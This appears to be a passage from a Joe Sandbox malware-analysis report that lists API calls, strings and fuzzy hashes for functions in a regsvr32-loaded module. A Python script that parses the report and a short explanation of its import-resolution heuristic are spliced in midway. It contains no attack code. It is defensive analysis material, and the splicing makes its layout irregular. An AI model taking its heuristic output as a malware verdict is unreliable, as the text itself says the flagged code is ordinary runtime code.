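• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: MessageSend
• String ID: Aramia 0.5$Asia$Atlanta$Beer$Boston$Brand $Bratislava$Brussels$Canada$Chicago$Edinburgh$Europe$Germany$Interbrew$Israel$Karlovacko 0.5$Lisbon$London$Lowenbrau 0.5$Madrid$Milk$New York$North America$Oil$Prague$Russia$San Francisco$Spoon$Stella 0.5$Tnuva 1L$USA$Zagreb
• Instruction Fuzzy Hash: F0E10176310A4C95EAA2EB1AE441BDA3750F78DBD8F81E605BD16A7796CE38C30DC700
Uniqueness
Uniqueness Score: -1.00%
"""

API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)        # (API, module, call-site address)
    associated: list = field(default_factory=list)  # associated dump names, link label removed
    meta: dict = field(default_factory=dict)        # every other "key: value" bullet
    uniqueness_score: str = ""

    @property
    def strings(self):
        # String IDs are '$'-joined; an empty value or a lone '$' means no strings.
        return [s for s in self.meta.get("String ID", "").split("$") if s]

def parse_blocks(text):
    """Split report text into FunctionBlock records; a 'Uniqueness Score' line closes a block."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()                 # drops the extraction indentation
        if not line:
            continue
        if cur is None:
            cur = FunctionBlock()
            blocks.append(cur)
        if line in HEADERS:
            section = line
        elif line.startswith("Uniqueness Score:"):
            cur.uniqueness_score = line.split(":", 1)[1].strip()
            cur = None
        elif section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append((m.group(1), m.group(2), int(m.group(4), 16)))
        elif m := KV_RE.match(line):
            key, val = m.group(1).strip(), m.group(2).strip()
            if key == "Associated":
                if val.endswith("Download File"):
                    val = val[: -len("Download File")]
                cur.associated.append(val)
            else:
                cur.meta[key] = val
    return blocks

def runtime_resolved_imports(block):
    """Heuristic (an assumption, not a Joe Sandbox rule): a function that calls LoadLibrary*
    and GetProcAddress and carries names in its String ID is resolving imports at run time.
    Returns (library names, procedure names); both empty when the heuristic does not apply."""
    names = {api for api, _, _ in block.apis}
    if "GetProcAddress" not in names or not any(n.startswith("LoadLibrary") for n in names):
        return [], []
    libs = [s for s in block.strings if s.upper().endswith(".DLL")]
    return libs, [s for s in block.strings if s not in libs]

def index_by_fuzzy_hash(blocks):
    """Instruction Fuzzy Hash -> blocks, for matching functions across dumps or reports."""
    index = {}
    for b in blocks:
        index.setdefault(b.meta.get("Instruction Fuzzy Hash", ""), []).append(b)
    return index
```

Run against the first sample block, `runtime_resolved_imports` reports USER32.DLL as the library and GetActiveWindow, GetLastActivePopup, GetProcessWindowStation, GetUserObjectInformationA and MessageBoxA as the procedures resolved through GetProcAddress. That exact set, wrapped in EncodePointer/DecodePointer, is what the Visual C++ runtime's own message-box helper does, so the heuristic is a first-pass filter that surfaces candidates for a human to classify, not a malicious-behaviour verdict; the Instruction Fuzzy Hash index is what lets you recognise the same function again in another dump without re-running the plugin.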
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
• API String ID: 667068680-68207542
• Opcode ID: 4713852c4557f625c8d7565be3f179c50b0928aeb3ff9648270c5aa5b5c9611a
• Instruction ID: 8deb09193d376067e18dbf9bfd0050fd8e78e2f7df0430bd40db9a31185d2816
• Opcode Fuzzy Hash: 4713852c4557f625c8d7565be3f179c50b0928aeb3ff9648270c5aa5b5c9611a
• Instruction Fuzzy Hash: ED319F75A05B4E81EA82DB04F9C43F533A5E70D7D9F46C829A98943320EF78429C8B15
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: _getptd$BlockUnwind$BaseEntryExceptionFunctionImageLookupRaiseThrow
• String ID: bad exception$csm$csm$csm
• API String ID: 2351602029-820278400
• Opcode ID: 059cdec533e8a3316add5beaa7302532266bd107d7566b7a8481e6d0d3181a8f
• Instruction ID: 1ababa2a4d594116706e3837d9c9b6ee6a67532c01c0d1aec0ef550336020ec7
• Opcode Fuzzy Hash: 059cdec533e8a3316add5beaa7302532266bd107d7566b7a8481e6d0d3181a8f
• Instruction Fuzzy Hash: 7BE19273204A8886DAB3EF25A0413ED67A4F7597C4F44C525FE990BB96CF38C699C701
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: RectWindow$ClientCopyLongParent$MessagePointsSend
• String ID: (
• API String ID: 2719113648-3887548279
• Opcode ID: 4323494541abe2e925520ec77bf9b03878c3640abc804f14a7688ed33ea0d74f
• Instruction ID: b70a0e5a3b35093f1dc4838cf6f2da899779a35083040c1adacc8837205307eb
• Opcode Fuzzy Hash: 4323494541abe2e925520ec77bf9b03878c3640abc804f14a7688ed33ea0d74f
• Instruction Fuzzy Hash: F561943231868987EB95CB25E54479EB7B1F78DBC1F588021FB4A43B48DF79DA098B00
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: AddressProc$CloseHandleModuleOpenQueryValue
• String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
• API String ID: 380410164-3617302793
• Opcode ID: d2e83d71bbf2ddd168d75f634448deb0729e88365b38b5cde735c49250c2094b
• Instruction ID: de56255bdfed1b31624be8c3ac4217a3ab46b7b30178a0990ea0192334bf7d7a
• Opcode Fuzzy Hash: d2e83d71bbf2ddd168d75f634448deb0729e88365b38b5cde735c49250c2094b
• Instruction Fuzzy Hash: 56515872201F4886FBA68B54E8843DA73A0F75C7D9F128525FA4C426A6DF7CC68DC700
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: _getptd$CreateFrameInfo
• String ID: csm
• API String ID: 4181383844-1018135373
• Opcode ID: 277d6ecbfe260b60cf314e284520aafbac91a01f2e982eecdabe551723416719
• Instruction ID: 9eccc25229236da607564f4d9f0b1b8304b780951be675bf39de0ed6b0ce1da4
• Opcode Fuzzy Hash: 277d6ecbfe260b60cf314e284520aafbac91a01f2e982eecdabe551723416719
• Instruction Fuzzy Hash: F0413C32240B8982DAA2DF15E4467EE77A4F389BD0F558125EE9D17B96DF34C298CB00
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: free$_lock$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1575098132-0
• Opcode ID: cfcb56500bceffba9f83b6bb62c0275a40306f319f07eb4bd22850f745fa76f9
• Instruction ID: 82aa94abd53c0c7867c73e4535b07b727d5c1a8626a3805f5fc64995b1e1639c
• Opcode Fuzzy Hash: cfcb56500bceffba9f83b6bb62c0275a40306f319f07eb4bd22850f745fa76f9
• Instruction Fuzzy Hash: C4311831303A4885FEDBEBA590A23FD6355AB8CBC4F488565B90E076D6CF28CB4C8351
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                    • API String ID: 948315288-2852464175
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: ByteCharMultiWide$Infofree$malloc
• String ID:
• API String ID: 1309074677-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeHookLoadLockUnhookWindows
• String ID:
• API String ID: 3362358738-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
• String ID:
• API String ID: 994105223-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: Window$AtomCallGlobalProcPropRect$DeleteFindLongRemove
• String ID: AfxOldWndProc423
• API String ID: 3892049428-1060338832
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: Object$Stock$CapsDeviceRelease
• String ID: System
• API String ID: 46613423-3470857405
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: free$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1012874770-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLastmalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3804003340-0
                                                                                                                                                                                    • Opcode ID: 65f2cf0424f7e3104c73e365b73fe46c84e099b92c87a7cba5430a12f7d0af07
                                                                                                                                                                                    • Instruction ID: 504087e924657a0bcfa27ecac2731c3ab7e97f5b3436c2a0ab2bd63155669eae
                                                                                                                                                                                    • Opcode Fuzzy Hash: 65f2cf0424f7e3104c73e365b73fe46c84e099b92c87a7cba5430a12f7d0af07
                                                                                                                                                                                    • Instruction Fuzzy Hash: AE61BC32204A888BEBA39F25D8807D977A6F74DBE8F548215FE1953BD4CF74CA488340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2551688548-0
                                                                                                                                                                                    • Opcode ID: 1e9fbbc3dbe57921067f085e0747a7e134988848091babb757d220db944a2a90
                                                                                                                                                                                    • Instruction ID: ec18cfeff2b3fe096ca45f69392d90378962c9c2c538fcb42e6b9c2c5225d6c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e9fbbc3dbe57921067f085e0747a7e134988848091babb757d220db944a2a90
                                                                                                                                                                                    • Instruction Fuzzy Hash: F6418D31612A4889FAD3DB51EC813D9A3A4B79C7C9F15C025BA4D47BA6EF38C66DC304
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _cwprintf_s_l
                                                                                                                                                                                    • String ID: %s (%s:%d)$%s (%s:%d)%s$C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl$Exception thrown in destructor$m
                                                                                                                                                                                    • API String ID: 2941638530-2286653399
                                                                                                                                                                                    • Opcode ID: f2a865bf828471275d3af9273fe5280f9a4a05953590ff50600787b0b1bae94d
                                                                                                                                                                                    • Instruction ID: 894d6bedba28786ac668ddf2e205677fe09791d4162071f201a71a6f61b38d26
                                                                                                                                                                                    • Opcode Fuzzy Hash: f2a865bf828471275d3af9273fe5280f9a4a05953590ff50600787b0b1bae94d
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5214A76240A89D6EB86DF25D8407D92361F789BD8F848016BA4D47765DF38C68DC340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _cwprintf_s_l
                                                                                                                                                                                    • String ID: %s (%s:%d)$%s (%s:%d)%s$8$Exception thrown in destructor$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
                                                                                                                                                                                    • API String ID: 2941638530-2049090729
                                                                                                                                                                                    • Opcode ID: e47fb644f89d1c5540396ebd654497df7c14707678480f34e70c810658df3cee
                                                                                                                                                                                    • Instruction ID: 4165e8df3eab90fad3419edddea937445478ec48b4668971702eb4fd3d588469
                                                                                                                                                                                    • Opcode Fuzzy Hash: e47fb644f89d1c5540396ebd654497df7c14707678480f34e70c810658df3cee
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF214A76201B49D6EB96DF25E8507E92365F788BD8F858022FA0D47765DF38C68DC340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalSection$Leave$AllocLocalValue$Enter
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2344649020-0
                                                                                                                                                                                    • Opcode ID: a71c1a953a4658dcad2fd3d96841059a19a67f7c7767339143e75915b3bdf1dc
                                                                                                                                                                                    • Instruction ID: 3ac6b84e638dcf9559a4c9cb53870d201d45975a1eb3b9efe372238c3bc65534
                                                                                                                                                                                    • Opcode Fuzzy Hash: a71c1a953a4658dcad2fd3d96841059a19a67f7c7767339143e75915b3bdf1dc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0341C032600F4897EB96CF25D4903E973A5F74CBE5F108215EA2A83794CF38DA69C340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2918714741-0
                                                                                                                                                                                    • Opcode ID: 5fe8c6ef0194c3ea1803748261baa358e3cb48f9a62a78d95c10b61d10b29ea6
                                                                                                                                                                                    • Instruction ID: cb3c2a7aebeefd5943992f16d8a556efa423499811155f93aa8e604d6ea879e8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fe8c6ef0194c3ea1803748261baa358e3cb48f9a62a78d95c10b61d10b29ea6
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC418232505B488AEBF39B55A4403EEB361A79D7E4F64C611FAA9437D6CF38C6188710
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __doserrno_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 921712934-0
                                                                                                                                                                                    • Opcode ID: 9d939c80741d2301966f4670f951b5c28dc73e16d2268d218e037a8ca9a879d3
                                                                                                                                                                                    • Instruction ID: 9756c0223caaab29dcb060dd82a048ebe9745fef1679326519cfdf289b3ba782
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d939c80741d2301966f4670f951b5c28dc73e16d2268d218e037a8ca9a879d3
                                                                                                                                                                                    • Instruction Fuzzy Hash: A031BC32612B6889E3936F65A8417DD7751AB89BF0FA5C715BE3907BD3CF3882168700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __doserrno_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 921712934-0
                                                                                                                                                                                    • Opcode ID: 573213ff306147f9f3e7e2e12180e771baebcbf52806ff7d2705c40bc8994e8b
                                                                                                                                                                                    • Instruction ID: d22bd5b64ca0b5cdf4bb450e75ffe74a40766e49a6e009e0d129e5f12afecdcb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 573213ff306147f9f3e7e2e12180e771baebcbf52806ff7d2705c40bc8994e8b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F310F326113584AE793AF65A8417DD7751ABC9BE4FA6C610BA250BBD3CF38C60A8700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __doserrno_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 921712934-0
